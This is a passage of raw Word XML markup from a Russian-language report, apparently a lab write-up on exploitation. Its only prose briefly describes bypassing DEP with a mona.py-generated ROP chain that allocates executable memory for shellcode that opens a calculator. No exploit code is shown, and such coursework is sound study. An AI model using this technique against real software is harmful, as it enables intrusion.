        <w:t xml:space="preserve">. Далее нужно обойти </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DEP</w:t>
      </w:r>
      <w:r w:rsidRPr="003C1975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защиту с помощью </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ROP</w:t>
      </w:r>
      <w:r w:rsidRPr="003C1975">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>цепочки</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00611EDD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>сгенерированной</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00611EDD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>скриптом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mona</w:t>
      </w:r>
      <w:r w:rsidRPr="003C1975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py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00611EDD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Также она подготавливает и в</w:t>
      </w:r>
      <w:r w:rsidR="00611EDD" w:rsidRPr="00611EDD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ыдел</w:t>
      </w:r>
      <w:r w:rsidR="00611EDD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>яет</w:t>
      </w:r>
      <w:r w:rsidR="00611EDD" w:rsidRPr="00611EDD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> память с правами на выполнение</w:t>
      </w:r>
      <w:r w:rsidR="00611EDD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> кода. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Сам шелл-код открывает калькулятор.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA8816A" w14:textId="77777777" w:rsidR="00EC5762" w:rsidRDefault="00EC5762" w:rsidP="00EC5762">
      <w:pPr>
        <w:keepNext/>
        <w:suppressAutoHyphens/>
        <w:spacing w:before="240"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F4C038E" wp14:editId="7D3D537C">
            <wp:extent cx="5783926" cy="1641376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2" t="4994" r="6473" b="3964"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5811475" cy="1649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4804A" w14:textId="26DBA443" w:rsidR="00EC5762" w:rsidRPr="00EC5762" w:rsidRDefault="00EC5762" w:rsidP="00EC5762">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC5762">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC5762">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00EC5762">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00EC5762">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00EC5762">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC5762">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00EC5762">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC5762">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>схема конфигурационного файла</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49930BBF" w14:textId="29367E72" w:rsidR="00FF1575" w:rsidRPr="00A75863" w:rsidRDefault="00FF1575" w:rsidP="00FF1575">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:before="240"/>
        <w:ind w:left="1134" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A9DB002" w14:textId="7E761956" w:rsidR="00FF1575" w:rsidRPr="00A75863" w:rsidRDefault="00FF1575" w:rsidP="00FF1575">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:before="240"/>
        <w:ind w:left="1134" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13B6E591" w14:textId="6A919FC0" w:rsidR="00FF1575" w:rsidRPr="00A75863" w:rsidRDefault="00FF1575" w:rsidP="00FF1575">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:before="240"/>
        <w:ind w:left="1134" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FAA6BCD" w14:textId="77F69C9E" w:rsidR="00FF1575" w:rsidRPr="00A75863" w:rsidRDefault="00FF1575" w:rsidP="00FF1575">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:before="240"/>
        <w:ind w:left="1134" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AE3510F" w14:textId="0DA98970" w:rsidR="00FF1575" w:rsidRPr="00A75863" w:rsidRDefault="00FF1575" w:rsidP="00FF1575">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:before="240"/>
        <w:ind w:left="1134" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C0A5120" w14:textId="72D6FE61" w:rsidR="00FF1575" w:rsidRPr="00A75863" w:rsidRDefault="00FF1575" w:rsidP="00FF1575">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:before="240"/>
        <w:ind w:left="1134" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CE9D390" w14:textId="71660CC2" w:rsidR="00FF1575" w:rsidRPr="00A75863" w:rsidRDefault="00FF1575" w:rsidP="00FF1575">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:before="240"/>
        <w:ind w:left="1134" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E6E9405" w14:textId="77777777" w:rsidR="00A151EA" w:rsidRPr="00A75863" w:rsidRDefault="00A151EA" w:rsidP="00A151EA"/>
    <w:sectPr w:rsidR="00A151EA" w:rsidRPr="00A75863" w:rsidSect="002D57C0">
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="720" w:right="616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-218"/>
        </w:tabs>
        <w:ind w:left="21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-218"/>
        </w:tabs>
        <w:ind w:left="35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-218"/>
        </w:tabs>
        <w:ind w:left="50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218"/>
        </w:tabs>
        <w:ind w:left="64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218"/>
        </w:tabs>
        <w:ind w:left="79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218"/>
        </w:tabs>
        <w:ind w:left="93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-218"/>
        </w:tabs>
        <w:ind w:left="107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218"/>
        </w:tabs>
        <w:ind w:left="122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-218"/>
        </w:tabs>
        <w:ind w:left="1366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EC50EE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="48F2EC18"/>
    <w:lvl w:ilvl="0" w:tplc="741AAD14">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1494" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:eastAsiaTheme="minorEastAsia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26B17E5E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7CB25CE8"/>
    <w:lvl w:ilvl="0" w:tplc="C4DA5AC8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="0278F386" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0FBE3B98" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="91B69E5A" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="8B0AA398" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="6EF6766A" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="1A603572" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="AD308312" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="D63A0B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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="29E9781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1B8182D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="69CACCF8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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="66470C21"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="50AC662A"/>
    <w:lvl w:ilvl="0" w:tplc="741AAD14">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1494" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:eastAsiaTheme="minorEastAsia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49A17C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5"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="14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7"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="1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11E7B"/>
    <w:rsid w:val="000B34BD"/>
    <w:rsid w:val="000B50CC"/>
    <w:rsid w:val="000C050C"/>
    <w:rsid w:val="00100065"/>
    <w:rsid w:val="00114606"/>
    <w:rsid w:val="00117ED8"/>
    <w:rsid w:val="0015740B"/>
    <w:rsid w:val="0016054D"/>
    <w:rsid w:val="00162CE5"/>
    <w:rsid w:val="001A3C63"/>
    <w:rsid w:val="001B4CC8"/>
    <w:rsid w:val="00206735"/>
    <w:rsid w:val="00220533"/>
    <w:rsid w:val="00233BB6"/>
    <w:rsid w:val="002370E1"/>
    <w:rsid w:val="00240026"/>
    <w:rsid w:val="00242C00"/>
    <w:rsid w:val="00257EA5"/>
    <w:rsid w:val="00266764"/>
    <w:rsid w:val="002816E4"/>
    <w:rsid w:val="002C1898"/>
    <w:rsid w:val="002D57C0"/>
    <w:rsid w:val="002E7AF9"/>
    <w:rsid w:val="002F219C"/>
    <w:rsid w:val="002F6B15"/>
    <w:rsid w:val="00310242"/>
    <w:rsid w:val="00323A50"/>
    <w:rsid w:val="0033747B"/>
    <w:rsid w:val="0036239B"/>
    <w:rsid w:val="00367094"/>
    <w:rsid w:val="0038536A"/>
    <w:rsid w:val="003C1975"/>
    <w:rsid w:val="003D1D31"/>
    <w:rsid w:val="003E1E58"/>
    <w:rsid w:val="00403B40"/>
    <w:rsid w:val="0040431E"/>
    <w:rsid w:val="00410EE8"/>
    <w:rsid w:val="0041523E"/>
    <w:rsid w:val="0042703A"/>
    <w:rsid w:val="0042777D"/>
    <w:rsid w:val="00465D5E"/>
    <w:rsid w:val="004757CF"/>
    <w:rsid w:val="00475C02"/>
    <w:rsid w:val="00485B27"/>
    <w:rsid w:val="004A183C"/>
    <w:rsid w:val="004A2BE4"/>
    <w:rsid w:val="004B4AFB"/>
    <w:rsid w:val="005034D0"/>
    <w:rsid w:val="00527C99"/>
    <w:rsid w:val="00531A66"/>
    <w:rsid w:val="005412D0"/>
    <w:rsid w:val="005916EC"/>
    <w:rsid w:val="005B195A"/>
    <w:rsid w:val="005B4173"/>
    <w:rsid w:val="005B6EC6"/>
    <w:rsid w:val="005C1399"/>
    <w:rsid w:val="005C1875"/>
    <w:rsid w:val="005D71D9"/>
    <w:rsid w:val="005E0C67"/>
    <w:rsid w:val="006005A4"/>
    <w:rsid w:val="00602EA7"/>
    <w:rsid w:val="00611EDD"/>
    <w:rsid w:val="006273BF"/>
    <w:rsid w:val="00631456"/>
    <w:rsid w:val="006346CB"/>
    <w:rsid w:val="006511BD"/>
    <w:rsid w:val="006630D6"/>
    <w:rsid w:val="006820A7"/>
    <w:rsid w:val="0069235A"/>
    <w:rsid w:val="006961BA"/>
    <w:rsid w:val="006F4BAC"/>
    <w:rsid w:val="00716DCE"/>
    <w:rsid w:val="00747C24"/>
    <w:rsid w:val="00772894"/>
    <w:rsid w:val="007951E3"/>
    <w:rsid w:val="00797640"/>
    <w:rsid w:val="007A1356"/>
    <w:rsid w:val="007B041B"/>
    <w:rsid w:val="007B1648"/>
    <w:rsid w:val="007C07EB"/>
    <w:rsid w:val="007F0FB7"/>
    <w:rsid w:val="008075C9"/>
    <w:rsid w:val="00820FCF"/>
    <w:rsid w:val="00862387"/>
    <w:rsid w:val="0087591F"/>
    <w:rsid w:val="008816A7"/>
    <w:rsid w:val="00887D02"/>
    <w:rsid w:val="0089253F"/>
    <w:rsid w:val="008A2F48"/>
    <w:rsid w:val="008A47C9"/>
    <w:rsid w:val="008C563F"/>
    <w:rsid w:val="008C5E25"/>
    <w:rsid w:val="008D54D9"/>
    <w:rsid w:val="008D5782"/>
    <w:rsid w:val="008D756D"/>
    <w:rsid w:val="008F6108"/>
    <w:rsid w:val="00911AB0"/>
    <w:rsid w:val="00914DA8"/>
    <w:rsid w:val="00962BEB"/>
    <w:rsid w:val="009643B2"/>
    <w:rsid w:val="0097290D"/>
    <w:rsid w:val="00996027"/>
    <w:rsid w:val="009A7505"/>
    <w:rsid w:val="009B0D9C"/>
    <w:rsid w:val="00A10FB1"/>
    <w:rsid w:val="00A151EA"/>
    <w:rsid w:val="00A51717"/>
    <w:rsid w:val="00A75400"/>
    <w:rsid w:val="00A75863"/>
    <w:rsid w:val="00A851BD"/>
    <w:rsid w:val="00AA5F6C"/>
    <w:rsid w:val="00AD5F94"/>
    <w:rsid w:val="00AE3C62"/>
    <w:rsid w:val="00B06217"/>
    <w:rsid w:val="00B36283"/>
    <w:rsid w:val="00B46D00"/>
    <w:rsid w:val="00B80E09"/>
    <w:rsid w:val="00BB673D"/>
    <w:rsid w:val="00BD4AE8"/>
    <w:rsid w:val="00BE0257"/>
    <w:rsid w:val="00C059E1"/>
    <w:rsid w:val="00C4002C"/>
    <w:rsid w:val="00C42D6E"/>
    <w:rsid w:val="00C47DED"/>
    <w:rsid w:val="00C66316"/>
    <w:rsid w:val="00C717BB"/>
    <w:rsid w:val="00C93BBE"/>
    <w:rsid w:val="00CB3341"/>
    <w:rsid w:val="00CC7C30"/>
    <w:rsid w:val="00CD3D2E"/>
    <w:rsid w:val="00CE1FBE"/>
    <w:rsid w:val="00CF1A7B"/>
    <w:rsid w:val="00CF73B4"/>
    <w:rsid w:val="00D07830"/>
    <w:rsid w:val="00D66EC7"/>
    <w:rsid w:val="00DA7361"/>
    <w:rsid w:val="00DC1488"/>
    <w:rsid w:val="00DD210C"/>
    <w:rsid w:val="00DE343B"/>
    <w:rsid w:val="00DE36B0"/>
    <w:rsid w:val="00E04AFD"/>
    <w:rsid w:val="00E06CB4"/>
    <w:rsid w:val="00E6083D"/>
    <w:rsid w:val="00E8008F"/>
    <w:rsid w:val="00E820A1"/>
    <w:rsid w:val="00E84FB9"/>
    <w:rsid w:val="00E96E98"/>
    <w:rsid w:val="00E97BE1"/>
    <w:rsid w:val="00EA26A1"/>
    <w:rsid w:val="00EC5762"/>
    <w:rsid w:val="00ED4AEE"/>
    <w:rsid w:val="00ED59BB"/>
    <w:rsid w:val="00F10C46"/>
    <w:rsid w:val="00F12C0E"/>
    <w:rsid w:val="00F446FF"/>
    <w:rsid w:val="00F4476C"/>
    <w:rsid w:val="00F82D00"/>
    <w:rsid w:val="00FB69F8"/>
    <w:rsid w:val="00FC15C9"/>
    <w:rsid w:val="00FC57F0"/>
    <w:rsid w:val="00FF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875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1"/>
    <w:qFormat/>
    <w:rsid w:val="00FB69F8"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="1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FB69F8"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="1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B69F8"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="1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B69F8"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="1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B69F8"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="1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B69F8"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="5"/>
        <w:numId w:val="1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B69F8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B69F8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B69F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B69F8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1"/>
    <w:semiHidden/>
    <w:rsid w:val="00FB69F8"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28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B69F8"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:iCs/>
      <w:sz w:val="28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B69F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B69F8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B69F8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B69F8"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="Times New Roman" w:hAnsi="Cambria" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
    </w:rPr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89253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character" w:customStyle="1" w:styleId="a7">
    <w:name w:val="для кода Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a6"/>
    <w:rsid w:val="0089253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851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Placeholder Text"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="002D57C0"/>
    <w:rPr>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ad">
    <w:name w:val="Введение_заключение"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="a"/>
    <w:qFormat/>
    <w:rsid w:val="005034D0"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:num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4030</TotalTime>
  <Pages>8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18</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-10-22T12:28:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-08T21:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>